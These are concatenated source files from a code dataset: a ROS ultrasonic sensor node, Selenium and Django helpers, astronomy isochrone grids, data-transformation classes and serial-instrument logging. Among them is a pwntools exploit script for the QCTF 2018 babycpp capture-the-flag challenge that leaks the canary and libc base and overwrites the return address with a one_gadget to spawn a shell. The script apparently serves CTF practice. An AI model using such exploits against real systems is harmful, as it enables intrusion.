GPIO\nimport time\nfrom time import sleep\nfrom std_msgs.msg import TwoFloat\n\n#ultrasonic node that publishes on the \"ultrasonic_topic\" topic the obstacle distances measured by the right and left ultrasonic sensors.\nclass UltraSuoni(object):\n\n    def __init__(self):\n        self.node_rate = 10\n        self.pub = rospy.Publisher(\"ultrasuoni_topic\", TwoFloat, queue_size=1)\n\t#we use the GPIO numbering scheme defined by the Broadcom chip\n\t# BCM = Broadcom SOC channel\n        GPIO.setmode(GPIO.BCM)\n        GPIO.setwarnings(False)\n\t#Trigger pin that must be driven to send the ultrasonic signal.\n        self.GPIO_TRIGGER = 4\n\t#Echo pins that produce a pulse which stops when the signal reflected by the object is received.\n        self.ECHO_RIGHT = 16\n        self.ECHO_LEFT = 26\n\t# set the trigger pin as output and the echo pins as input\n        GPIO.setup(self.GPIO_TRIGGER, GPIO.OUT)\n        GPIO.setup(self.ECHO_RIGHT, GPIO.IN)\n        GPIO.setup(self.ECHO_LEFT, GPIO.IN)\n    # method that returns the distance measured by a specific ultrasonic sensor\n    def distance(self, echo):\n        # maximum time to wait for the response in case something gets lost\n        MAX_TIME = 0.04 \n        # Set the trigger pin high to start the measurement\n        GPIO.output(self.GPIO_TRIGGER, True)\n        time.sleep(0.00001)\n        GPIO.output(self.GPIO_TRIGGER, False)\n        # make sure the start time is set in case of a very fast return\n        start = time.time()\n\t# and set a timeout equal to the start time plus MAX_TIME\n        timeout = start + MAX_TIME\n\n        # watch the input line to detect the start of the echo response\n        while GPIO.input(echo) == 0 and start <= timeout:\n\t    # start is updated\n            start = time.time()\n\t# stop is assigned the instant at which GPIO.input(echo) goes from 0 to 1\n        stop = time.time()\n\t# the timeout variable is updated to the previously measured stop value \n\t# plus the MAX_TIME variable.\n        timeout = stop + MAX_TIME\n        # Wait for the end of the echo response\n        while GPIO.input(echo) == 1 and stop <= timeout:\n\t    # stop is updated \n            stop = time.time()\n\t# the following setup looks unnecessary\n        GPIO.setup(self.GPIO_TRIGGER, GPIO.OUT)\n\t# Set the trigger pin low to stop the measurement\n        GPIO.output(self.GPIO_TRIGGER, False)\n\t\n\t# the elapsed time is computed as the difference between the stop and start values\n        elapsed = stop - start\n\t# the obstacle distance is obtained by multiplying the elapsed time by the speed of sound in air,\n\t# divided by 2 since the elapsed time covers both the outgoing and the return trip.\n        dista = (elapsed * 34300) / 2.0\n        time.sleep(0.02)\n        return dista\n\t\n    # method that computes the obstacle distances of both ultrasonic sensors using the function defined\n    # above and publishes them on the topic. 
\n def run_distance(self):\n right_dist1 = self.distance(self.ECHO_RIGHT)\n left_dist1 = self.distance(self.ECHO_LEFT)\n\n right_dist2 = self.distance(self.ECHO_RIGHT)\n left_dist2 = self.distance(self.ECHO_LEFT)\n\t# si considerano le differenze fra i valori di due misure successive per evitare la \n\t# presenza di valori spuri restituiti casualmente dal sensore a causa della sua imprecisione.\n difference_right = abs(right_dist1 - right_dist2)\n difference_left = abs(left_dist1 - left_dist2)\n\n ultra = TwoFloat()\n\t# se le 2 misure consecutive hanno ambedue le differenze minori di una certa soglia (20) allora viene pubblicata una delle due\n\t# altrimenti si ignorano entrambe.\n if difference_left < 20 and difference_right < 20:\n ultra.left_us = left_dist1\n ultra.right_us = right_dist1\n self.pub.publish(ultra)\n rospy.loginfo('{ULTRASUONI} Distanza sx: ' + str(left_dist1) + \", Distanza dx: \" + str(right_dist1))\n else:\n pass\n\n\nif __name__ == \"__main__\":\n ultra_suoni = UltraSuoni()\n rospy.init_node(\"ultrasuoni\", anonymous=True)\n loop = rospy.Rate(ultra_suoni.node_rate)\n while not rospy.is_shutdown():\n ultra_suoni.run_distance()\n loop.sleep()\n GPIO.cleanup()\n","sub_path":"ultrasonic_node.py","file_name":"ultrasonic_node.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"626634279","text":"from pwn import *\nr = remote('node3.buuoj.cn',25366)\n#r = process('./QCTF_2018_babycpp')\nelf = ELF('./QCTF_2018_babycpp')\nlibc = ELF('/libc-2.27.so')\n\ndef change(num):\n\tr.recvuntil('> ')\n\tr.sendline('1')\n\tr.sendline(str(num))\n\ndef get(array):\n\tr.recvuntil('> ')\n\tr.sendline('2')\n\tr.recvuntil('num:')\n\tr.sendline(array)\n\ndef unique():\n\tr.recvuntil('> ')\n\tr.sendline('3')\n\ndef get_data(l,h):\n\tif l < 0:\n\t\tl = 0x100000000 + l\n\tif h < 0:\n\t\th = 0x100000000 + h\n\tdata = h*0x100000000 + l\n\treturn data\n\nr.recvuntil('input n:')\nr.sendline('22')#22*4=88\nget('1 '*22)\nchange(28)\nunique()\nr.recvuntil('1 ')\ncanary_l = int(r.recvuntil(' '))\ncanary_h = int(r.recvuntil(' '))\ncanary = get_data(canary_l,canary_h)\nlog.success(hex(canary))\n\nleak_l = int(r.recvuntil(' '))\nleak_h = int(r.recvuntil(' '))\nleak = get_data(leak_l,leak_h)\nlog.success(hex(leak))\n\nleak_l = int(r.recvuntil(' '))\nleak_h = int(r.recvuntil(' '))\nleak = get_data(leak_l,leak_h)\nlog.success(hex(leak))\nlibc_base = leak-231-libc.sym['__libc_start_main']\nlog.success(hex(libc_base))\none = libc_base+0x4f322\none_l = one%0x100000000\nif one_l > 0x7fffffff:\n\tone_l = 0x100000000-one_l\none_h = one>>32\nlog.info(str(one_l))\nlog.info(str(one_h))\nget('1 '*22+str(canary_l)+' '+str(canary_h)+' '+'1 1 '+str(one_l)+' '+str(one_h))\nr.sendline('4')\nr.interactive()","sub_path":"pwn/qctf_2018_babycpp/fuck.py","file_name":"fuck.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"103497584","text":"# coding:utf-8\nfrom time import sleep\n\nfrom driver.Driver import Driver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport yaml\n\n\nclass BasePage(object):\n def __init__(self):\n self.driver = Driver._driver\n self.driver.maximize_window()\n # self.driver.get('https:/open.10086.cn')\n\n\n def find(self,key):\n return self.driver.find_element_by_xpath(key)\n\n\n def loadStep(self,op_path,key,**kwargs):\n 
file=open(op_path)\n po_data=yaml.load(file)\n po_method=po_data[key]\n for step in po_method:\n location=step['location']\n for k,v in kwargs.items():\n location=str(step['location']).replace('$%s' %k, v)\n element= self.driver.find_element_by_xpath(location)\n action= str(step['action'])\n print(action)\n if action=='click':\n sleep(2)\n element.click()\n sleep(2)\n elif action=='none':\n return element\n else:\n \"unknow commond\"\n\n\n\n\n\n # def find(self,kv):\n # return self.driver.find_element(*kv)\n\n\n def back(self):\n\n self.driver.back()\n return self\n\n def forward(self):\n\n self.driver.forward()\n return self\n\n def open_url(self, url):\n\n self.driver.get(url)\n return self\n\n\n\n\n def quitBrowser(self):\n\n self.driver.quit()\n return self\n","sub_path":"page/BasePage.py","file_name":"BasePage.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"184130427","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .models import *\nfrom .forms import *\nimport json\nfrom django.contrib.auth.models import User\n\n\ndef home(request):\n if request.session.has_key('uid'):\n\n subjects = Subject.objects.all()\n students = Student.objects.all()\n enrolls = Enroll.objects.all()\n total_courses = subjects.count()\n total_students = students.count()\n active = Enroll.objects.filter(status=\"Active\").count()\n total_enrolls = enrolls.count()\n stucourse_enrolls=\"\"\n searchfilter=\"\"\n \n if request.user.is_staff:\n userr = User.objects.get(username=request.user)\n else:\n print(request.user)\n userr = Student.objects.get(User_Name=request.user)\n stucourse_enrolls = userr.enroll_set.all()\n context = {'subjects':subjects,'students':students,'enrolls':enrolls,'total_courses':total_courses,'total_students':total_students,'active':active,'total_enrolls':total_enrolls,'userr':userr,'stucourse_enrolls':stucourse_enrolls}\n return render(request,'dash.html',context)\n else:\n return redirect('login')\n\ndef about(request):\n return render(request,'about.html')\n\n\ndef contents(request,pk):\n contents=Content.objects.get(subject=pk) \n context={'content':contents}\n return render(request,'content.html',context)\n\ndef list(request):\n subjects = Subject.objects.all().order_by('title') \n context = {'subjects':subjects} \n return render(request,'courses/list.html',context)\n\ndef contact(request):\n return render(request,'contact.html')\n \n\ndef enroll_course(request):\n data = json.loads(request.body)\n subjectid = data['subjectid']\n student = Student.objects.get(User_Name=request.user)\n subject = Subject.objects.get(id = subjectid)\n enroll = Enroll.objects.get_or_create(subject=subject,student=student,status=\"Inactive\")\n return JsonResponse(\"Enrolled a course\", safe=False) \n\ndef create_course(request):\n if request.method == 'POST':\n form = CourseForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = CourseForm() \n context ={'form':form} \n return render(request,'course_form.html',context)\n\ndef update_enroll(request, pk):\n enrolls = Enroll.objects.get(id=pk)\n if request.method == 'POST':\n form = EnrollForm(request.POST, instance=enrolls)\n if form.is_valid():\n form.save()\n enrolls.delete()\n return redirect('home')\n else:\n form = EnrollForm(instance=enrolls) \n context ={'form':form} \n return render(request,'enroll_form.html',context)\n\ndef remove_enroll(request, 
pk):\n enrolls = Enroll.objects.get(id=pk)\n form = EnrollForm(instance=enrolls) \n if request.method == 'POST':\n enrolls.delete() \n return redirect('home')\n context = {'enrolls':enrolls, 'form':form}\n return render(request,'deleteform.html',context) \n\n\ndef remove_uenroll(request, pk):\n enrolls = Enroll.objects.get(id=pk)\n form = EnrollForm(instance=enrolls) \n if request.method == 'POST':\n enrolls.delete() \n return redirect('home')\n context = {'enrolls':enrolls, 'form':form}\n return render(request,'deleteform.html',context) \n####################################\ndef best():\n enrolls = Enroll.objects.all()\n max = 0\n sub=[]\n bestseller = \"Django\" \n for i in range(0,len(enrolls)):\n sub.append(enrolls[i].subject)\n\n counts = dict() \n for subj in sub:\n if subj in counts:\n counts[subj] += 1\n else:\n counts[subj] = 1\n for key in counts:\n if max < counts[key]:\n max = counts[key]\n bestseller = key \n return bestseller \n##############################\ndef hp(request):\n bestseller=\"Django\"\n bestsellr = Subject.objects.get(title=bestseller)\n context = {'bestsellr':bestsellr} \n return render(request,'hp.html',context)\n\ndef search(request):\n query = request.GET['query']\n search_content = Subject.objects.filter(title__icontains=query)\n context = {'search_content':search_content,'query':query}\n return render(request,'search.html',context)\n","sub_path":"Elearn/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"427430235","text":"import os,re, glob\nimport numpy as np\nimport pandas as pd\nimport logging\nimport tarfile\nfrom distutils.version import StrictVersion\n\nfrom ..config import ISOCHRONES\nfrom ..grid import ModelGrid\n\nclass ParsecModelGrid(ModelGrid):\n name = 'parsec'\n common_columns = ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')\n\n phot_systems = ('opt', 'gaia', 'ir', 'sdss')\n\n phot_bands = dict(opt=['Umag', 'Bmag', 'Vmag',\n 'Rmag', 'Imag','Jmag', 'Hmag', 'Kmag'],\n gaia=['Gmag', 'G_BPmag', 'G_RPmag'],\n ir=['IRAC_3.6mag ', 'IRAC_4.5mag', 'IRAC_5.8mag', 'IRAC_8.0mag', 'MIPS_24mag', 'W1mag', 'W2mag', 'W3mag', 'W4mag'],\n sdss=['umag', 'gmag', 'rmag', 'imag', 'zmag'])\n\n default_kwargs = {'version':'1.0'}\n datadir = os.path.join(ISOCHRONES, 'parsec')\n #zenodo_record = 161241\n #zenodo_files = ()#('mist.tgz',)\n #zenodo_md5 = ('0deaaca2836c7148c27ce5ba5bbdfe59',)\n #master_tarball_file = 'parsec.tgz'\n\n default_bands = ('G','BP','RP','J','H','K','W1','W2','W3','g','r','i','z')\n\n def __init__(self, *args, **kwargs):\n version = kwargs.get('version', self.default_kwargs['version'])\n version = StrictVersion(str(version))\n\n super().__init__(*args, **kwargs)\n\n @classmethod\n def get_common_columns(cls, version=None, **kwargs):\n if version is None:\n version = cls.default_kwargs['version']\n\n version = StrictVersion(str(version))\n return ('Zini', 'Age', 'Mini', 'Mass','logL', 'logTe', 'logg')\n\n\n @property\n def version(self):\n return StrictVersion(str(self.kwargs['version']))\n\n @property\n def common_columns(self):\n return self.get_common_columns(self.version)\n \n def phot_tarball_url(self, phot):\n if phot=='ir': url = 'https://www.dropbox.com/s/rlb5ifn2htbgn5l/ir.tar.gz?dl=1'\n if phot=='sdss': url = 'https://www.dropbox.com/s/6ep3g9ey8j6waxl/sdss.tar.gz?dl=1'\n if phot=='gaia': url = 'https://www.dropbox.com/s/120hxb4n88apaov/gaia.tar.gz?dl=1'\n if phot=='opt': url = 
'https://www.dropbox.com/s/vdu58x4pfjbuhsz/opt.tar.gz?dl=1'\n return url\n\n @classmethod\n def get_band(cls, b, **kwargs):\n \"\"\"Defines what a \"shortcut\" band name refers to. Returns phot_system, band\n\n \"\"\"\n phot = None\n\n # Default to SDSS for these\n if b in ['u','g','r','i','z']:\n phot = 'sdss'\n band = '{}mag'.format(b)\n elif b in ['U','B','V','R','I','J','H','K']:\n phot = 'opt'\n band = '{}mag'.format(b)\n elif b in ['W1','W2','W3','W4']:\n phot = 'ir'\n band = '{}mag'.format(b)\n elif b in ('G'):\n phot = 'gaia'\n band = '{}mag'.format(b)\n elif b in ('BP','RP'):\n phot = 'gaia'\n band = 'G_{}mag'.format(b)\n\n if phot is None:\n for system, bands in cls.phot_bands.items():\n if b in bands:\n phot = system\n band = b\n break\n if phot is None:\n raise ValueError('Parsec grids cannot resolve band {}!'.format(b))\n return phot, band\n \n @classmethod\n def phot_tarball_file(cls, phot, **kwargs):\n return os.path.join(cls.datadir, '{}.tar.gz'.format(phot))\n \n def get_filenames(self, phot):\n d = os.path.join(self.datadir, '{}'.format(phot))\n if not os.path.exists(d):\n if not os.path.exists(self.phot_tarball_file(phot)):\n self.extract_phot_tarball(phot)\n\n return [os.path.join(d,f) for f in os.listdir(d) if re.search('\\.dat$', f)]\n\n @classmethod\n def get_feh(cls, filename):\n m = re.search('([mp])([0-9]{3}).', filename)\n if m:\n sign = 1 if m.group(1)=='p' else -1\n return float(m.group(2))/100. * sign\n else:\n raise ValueError('{} not a valid Parsec file? Cannnot parse [Fe/H]'.format(filename))\n\n @classmethod\n def to_df(cls, filename):\n with open(filename, 'r', encoding='latin-1') as fin:\n while True:\n line = fin.readline()\n if re.match('# Zini', line):\n column_names = line[1:].split()\n break\n feh = cls.get_feh(filename)\n df = pd.read_table(filename, comment='#', delim_whitespace=True,\n skip_blank_lines=True, names=column_names)\n df['feh']=cls.get_feh(filename)\n df['Zini'] = df['feh']#feh\n df['Age'] = np.log10(df['Age'])\n return df\n\n def df_all(self, phot, **kwargs):\n df = super(ParsecModelGrid, self).df_all(phot)\n df = df.sort_values(by=['feh','Age','Mini'])\n df.index = [df.feh, df.Age]\n return df\n\n def hdf_filename(self, phot):\n return os.path.join(self.datadir, '{}.h5'.format(phot))\n","sub_path":"isochrones/parsec/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"298284281","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/datalogue/models/transformations/time.py\n# Compiled at: 2020-04-14 15:37:55\n# Size of source mod 2**32: 7718 bytes\nfrom datalogue.models.transformations.commons import Transformation, DataType\nfrom datalogue.utils import _parse_string_list, SerializableStringEnum\nfrom datalogue.errors import _enum_parse_error, DtlError, _property_not_found, _invalid_property_type\nfrom typing import List, Union\n\nclass Period:\n\n def __init__(self, identifier: str, value: int, unit: str):\n self.identifier = identifier\n self.value = value\n self.unit = unit\n\n def __eq__(self, other: 'Period'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"Period(identifier: {self.identifier}, value: {self.value}, unit: {self.unit})\"\n\n def _as_payload(self) -> 
dict:\n return {'identifier':self.identifier, \n 'value':self.value, \n 'unit':self.unit}\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'Period')]:\n identifier = json.get('identifier')\n if identifier is None:\n return _property_not_found('identifier', json)\n value = json.get('value')\n if value is None:\n return _property_not_found('value', json)\n else:\n unit = json.get('unit')\n if unit is None:\n return _property_not_found('unit', json)\n return Period(identifier, value, unit)\n\n\nclass Format:\n\n def __init__(self, start: str, end: str, separator: str):\n self.start = start\n self.end = end\n self.separator = separator\n\n def __eq__(self, other: 'Format'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"Format(start: {self.start}, end: {self.end}, separator: {self.separator})\"\n\n def _as_payload(self) -> dict:\n return {'start':self.start, \n 'separator':self.separator, \n 'end':self.end}\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'Format')]:\n start = json.get('start')\n if start is None:\n return _property_not_found('start', json)\n separator = json.get('separator')\n if separator is None:\n return _property_not_found('separator', json)\n else:\n end = json.get('end')\n if end is None:\n return _property_not_found('end', json)\n return Format(start, end, separator)\n\n\nclass Output:\n\n def __init__(self, start_label: str, end_label: str, format: str):\n self.start_label = start_label\n self.end_label = end_label\n self.format = format\n\n def __eq__(self, other: 'Output'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"Output(start: {self.start_label}, end: {self.end_label}, separator: {self.format})\"\n\n def _as_payload(self) -> dict:\n return {'startLabel':self.start_label, \n 'endLabel':self.end_label, \n 'format':self.format}\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'Output')]:\n start_label = json.get('startLabel')\n if start_label is None:\n return _property_not_found('startLabel', json)\n end_label = json.get('endLabel')\n if end_label is None:\n return _property_not_found('endLabel', json)\n else:\n format = json.get('format')\n if format is None:\n return _property_not_found('format', json)\n return Output(start_label, end_label, format)\n\n\nclass ParseDatesAndCreatePeriodNodes(Transformation):\n type_str = 'ParseDatesAndCreatePeriodNodes'\n\n def __init__(self, path: List[str], period: Period, date_format: Format, output: Output):\n Transformation.__init__(self, ParseDatesAndCreatePeriodNodes.type_str)\n self.path = path\n self.period = period\n self.format = date_format\n self.output = output\n\n def __eq__(self, other: 'ParseDatesAndCreatePeriodNodes'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"ParseDatesAndCreatePeriodNodes(path: {self.path!r}, period: {self.period}, format: {self.format}, output: {self.output})\"\n\n def _as_payload(self) -> dict:\n base = self._base_payload()\n base['path'] = self.path\n base['period'] = self.period._as_payload()\n base['format'] = self.format._as_payload()\n base['output'] = self.output._as_payload()\n return base\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'ParseDatesAndCreatePeriodNodes')]:\n path = 
json.get('path')\n if path is None:\n return _property_not_found('path', json)\n path = _parse_string_list(path)\n if isinstance(path, DtlError):\n return path\n period = json.get('period')\n if period is None:\n return _property_not_found('period', json)\n period = Period._from_payload(period)\n if isinstance(period, DtlError):\n return period\n date_format = json.get('format')\n if date_format is None:\n return _property_not_found('format', json)\n date_format = Format._from_payload(date_format)\n if isinstance(date_format, DtlError):\n return date_format\n output = json.get('output')\n if output is None:\n return _property_not_found('output', json)\n else:\n output = Output._from_payload(output)\n if isinstance(output, DtlError):\n return output\n return ParseDatesAndCreatePeriodNodes(path, period, date_format, output)\n\n\nclass InterpretAsDateAndCreatePeriodNodes(Transformation):\n type_str = 'InterpretAsDateAndCreatePeriodNodes'\n\n def __init__(self, path: List[str], period: str, year: int, output: Output):\n Transformation.__init__(self, InterpretAsDateAndCreatePeriodNodes.type_str)\n self.path = path\n self.period = period\n self.year = year\n self.output = output\n\n def __eq__(self, other: 'InterpretAsDateAndCreatePeriodNodes'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"InterpretAsDateAndCreatePeriodNodes(path: {self.path!r}, period: {self.period}, year: {self.year}, output: {self.output})\"\n\n def _as_payload(self) -> dict:\n base = self._base_payload()\n base['path'] = self.path\n base['period'] = self.period\n base['year'] = self.year\n base['output'] = self.output._as_payload()\n return base\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'InterpretAsDateAndCreatePeriodNodes')]:\n path = json.get('path')\n if path is None:\n return _property_not_found('path', json)\n path = _parse_string_list(path)\n if isinstance(path, DtlError):\n return path\n period = json.get('period')\n if period is None:\n return _property_not_found('period', json)\n year = json.get('year')\n if year is None:\n return _property_not_found('year', json)\n output = json.get('output')\n if output is None:\n return _property_not_found('output', json)\n else:\n output = Output._from_payload(output)\n if isinstance(output, DtlError):\n return output\n return InterpretAsDateAndCreatePeriodNodes(path, period, year, output)","sub_path":"pycfiles/datalogue-0.33.3-py3.6/time.cpython-36.py","file_name":"time.cpython-36.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"257121061","text":"from app.api import helper\nfrom app.api import Resource\nfrom app.api import datetime as dt\nfrom app.api.models import Country\nfrom app.api.models import serializer\nfrom app.api import re\n\n\nclass BaseHandler(Resource):\n DEFAULT_ERR_MSG = 'bad response from server'\n DEFAULT_STATUS_CODE = 500\n # to match: [ Province/State|Country|Region|Lat|Long|1/1/20|1/2/20 and so on ....> ]\n EXPECTED_HEADER_PATTERN = r'((P\\w+\\/S\\w+)\\|(C\\w+\\/R\\w+)\\|(L\\w+)\\|(L\\w+)\\|(\\d{1,2}\\/\\d{1,2}\\/\\d{1,4}\\|*)+)'\n\n def __init__(self, api=None):\n super(BaseHandler, self).__init__(api=api)\n self.__err = False\n self.msg = None\n self.code = None\n self.payload = None\n self.metadata = None\n self.status = None\n self.response = None\n self.data = None\n self.last_updated = None\n self.__set_defaults()\n\n 
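# initializes msg, code, payload, metadata, status and response to their default values\n    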
def __set_defaults(self):\n self.msg = BaseHandler.DEFAULT_ERR_MSG\n self.code = BaseHandler.DEFAULT_STATUS_CODE\n self.payload = {\"error\": self.__err}\n self.metadata = {}\n self.status = 'OK'\n self.response = self.payload\n\n def __validate_headers(self):\n expected_header_pattern = BaseHandler.EXPECTED_HEADER_PATTERN\n try:\n headers_in_a_string = '|'.join(self.payload.columns)\n match_was_found = re.match(expected_header_pattern, headers_in_a_string)\n if not match_was_found:\n raise ValueError('Payload headers did not match the expected pattern.')\n except Exception as e:\n self.__err = True\n self.msg = e\n\n def __validate_data_types(self):\n try:\n raise NotImplementedError('Data type validation is not implemented yet.')\n except Exception as e:\n # self. __err = True\n self.msg = e\n\n def __validate_payload__(self):\n self.__validate_headers()\n self.__validate_data_types()\n validation_status = not self.__err\n return validation_status\n\n def __validate_response(self):\n acceptable_response_types = [\"str\", \"list\", \"dict\"]\n response_type = helper.check_data_type(self.payload)\n return response_type in acceptable_response_types\n\n def __pre_process_payload__(self):\n try:\n self.payload.fillna('', inplace=True)\n self.payload.columns = list(map(lambda x: x.lower().replace('/', '_'), self.payload.columns))\n self.payload.country_region = self.payload.country_region.apply(lambda x: str(x).lower().replace(' ', '_'))\n self.payload.province_state = self.payload.province_state.apply(lambda x: str(x).lower().replace(' ', '_'))\n except Exception as e:\n self.__err = True\n self.msg = f'Pre-processor failed: [ {e} ]'\n\n def __set_last_updated_date__(self, date):\n expected_format = '%m_%d_%y'\n self.last_updated = dt.strptime(date, expected_format)\n\n @staticmethod\n def __update_check__(category):\n update_is_needed = Country.__check_for_update__(category)\n return update_is_needed\n\n def __serialize__(self, category):\n # make payload presentable\n if self.__err:\n self.msg = f'Serialization failed because: {self.msg}'\n raise ValueError(self.msg)\n self.payload = serializer.serialize_raw_data(self.payload, category)\n\n","sub_path":"app/api/services/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"235974833","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 8 14:50:09 2017\n\n@author: Adam\n\"\"\"\nimport os\nimport codecs\nimport time\nimport re\nimport csv\nimport serial\nimport pymysql\nimport numpy as np\nfrom random import gauss\n\nUSER_DIRE = os.path.join(os.path.expanduser(\"~\"), '.emon')\nINSTRUM_FILE = os.path.join(USER_DIRE, 'instrum.ini')\n\nclass FakeInstrument(object):\n \"\"\" simulate comms. 
with a serial instrument\"\"\"\n def __init__(self, settings):\n self.config = settings\n self.sensors = (settings['sensors'].strip()).split(',')\n \n def read_all(self, debug=False, close=True):\n \"\"\" return fake sensor data \"\"\"\n reads = []\n for i, sen in enumerate(self.sensors):\n reads.append('%.4f'%gauss(293 + 0.5*i, 0.1))\n return reads\n \n def close(self):\n \"\"\" close connection\"\"\"\n pass\n\nclass Instrument(object):\n \"\"\" serial communication with an instrument\"\"\"\n def __init__(self, settings):\n self.settings = settings\n self.setup()\n self.sensors = (settings['sensors'].strip()).split(',')\n # format response\n if 'regex' in settings:\n self.regex = settings['regex']\n else:\n self.regex = None\n\n def setup(self):\n \"\"\" setup serial connection\"\"\"\n self.connection = serial.Serial()\n for att in ['port',\n 'baudrate',\n 'bytesize',\n 'parity',\n 'stopbits',\n 'timeout',\n 'xonxoff',\n 'rtscts',\n 'dsrdtr',\n 'write_timeout',\n 'inter_byte_timeout']:\n if att in self.settings:\n # check if int\n try:\n val = int(self.settings[att])\n except ValueError:\n val = self.settings[att]\n # update serial configuration\n setattr(self.connection, att, val)\n\n def read_all(self, debug=False, close=True):\n \"\"\" read sensor data\"\"\"\n # check connection and flush buffer\n try:\n if not self.connection.is_open:\n self.connection.open()\n self.connection.flush()\n # query instrument\n reads = []\n cmd = codecs.decode(self.settings['cmd'], 'unicode-escape')\n for sen in self.sensors:\n self.connection.flushInput()\n # parse command\n serial_cmd = cmd.replace('#', sen)\n serial_cmd = bytes(serial_cmd, 'utf8')\n if debug:\n print(serial_cmd)\n # write command, read response\n self.connection.write(serial_cmd)\n # wait for acknowledgement / send enquiry\n if 'ack' in self.settings and 'enq' in self.settings:\n # needed for maxigauge\n ack = codecs.decode(self.settings['ack'], 'unicode-escape')\n if self.connection.readline() == bytes(ack, 'utf8'):\n # send enquiry\n enq = codecs.decode(self.settings['enq'], 'unicode-escape')\n self.connection.write(bytes(enq, 'utf8'))\n else:\n raise serial.SerialException('acknowledgement error')\n response = self.connection.readline()\n if debug:\n print(response)\n # format response\n response = response.strip()\n response = response.decode(\"utf-8\")\n if self.regex is not None:\n match = re.search(self.regex, response)\n response = match.group(1)\n reads.append(response)\n if close:\n # close connection\n self.connection.close()\n return reads\n except serial.SerialException:\n return \"connection failed\"\n\n def close(self):\n \"\"\" close connection\"\"\"\n if self.connection.is_open:\n self.connection.close()\n\ndef is_float_array(vals):\n \"\"\" check if can be converted to float array\n \"\"\"\n try:\n np.array(vals, dtype=float)\n return True\n except (ValueError, TypeError):\n return False\n\ndef sql_check(cols, settings, debug=False):\n \"\"\" check mysql server\n \"\"\"\n mariadb_connection = pymysql.connect(host=settings['sql_host'],\n port=int(settings['sql_port']),\n user=settings['sql_user'],\n password=settings['sql_password'],\n database=settings['sql_database'])\n with mariadb_connection.cursor() as cursor:\n # check table exists\n cursor.execute(\"SHOW TABLES;\")\n tbls = np.array(cursor.fetchall()).flatten()\n if debug:\n print(tbls)\n if settings['sql_table'] not in tbls:\n error_msg = settings['sql_table'] + ' not found in ' + settings['sql_database']\n raise ValueError(error_msg)\n # check columns exist\n cursor.execute(\"SHOW 
COLUMNS IN `\" + settings['sql_table'] + \"`;\")\n columns = np.array(cursor.fetchall())[:, 0].astype(str)\n if debug:\n print(columns)\n for lbl in cols:\n if lbl not in columns:\n error_msg = lbl + ' not found in ' + settings['sql_database'] + '.' + settings['sql_table']\n raise ValueError(error_msg)\n return \"ok\"\n\ndef sql_insert(vals, cols, settings, validate=True, debug=False):\n \"\"\" send to mysql server\n\n INSERT INTO <table>(<cols>) VALUES (<vals>);\n \"\"\"\n mariadb_connection = pymysql.connect(host=settings['sql_host'],\n port=int(settings['sql_port']),\n user=settings['sql_user'],\n password=settings['sql_password'],\n database=settings['sql_database'])\n with mariadb_connection.cursor() as cursor:\n # check values\n if validate:\n proceed = is_float_array(vals)\n else:\n proceed = True\n if proceed:\n vals = ', '.join(vals)\n cols = ', '.join(cols)\n sql = \"INSERT INTO \" + settings['sql_table'] + \"(\" + cols + \\\n \") VALUES (\" + vals + \");\"\n if debug:\n print(sql)\n cursor.execute(sql)\n mariadb_connection.commit()\n\ndef to_csv(vals, cols, settings, debug=False):\n \"\"\" save to out_dire/yyyy/fname_yyyymmdd.dat\n \"\"\"\n # build file path\n out_dire = settings['out_dire']\n fname = settings['fname']\n if 'delim' in settings:\n delim = codecs.decode(settings['delim'], 'unicode-escape')\n else:\n delim = ','\n ## time\n year = time.strftime('%Y')\n today = time.strftime('%Y%m%d')\n if not os.path.isdir(out_dire):\n raise IOError(out_dire + ' does not exist')\n ## sub directory\n sub_dire = os.path.join(out_dire, year)\n if not os.path.isdir(sub_dire):\n os.makedirs(sub_dire)\n ## file name\n fname = fname + '_' + today + '.dat'\n out_fil = os.path.join(sub_dire, fname)\n # save output\n output = vals.copy()\n timestamp = time.strftime('%Y-%m-%d %H:%M:%S')\n output.insert(0, timestamp)\n if debug:\n print(out_fil)\n print(output)\n ## header\n if not os.path.isfile(out_fil):\n header = cols.copy()\n header.insert(0, 'TIMESTAMP')\n with 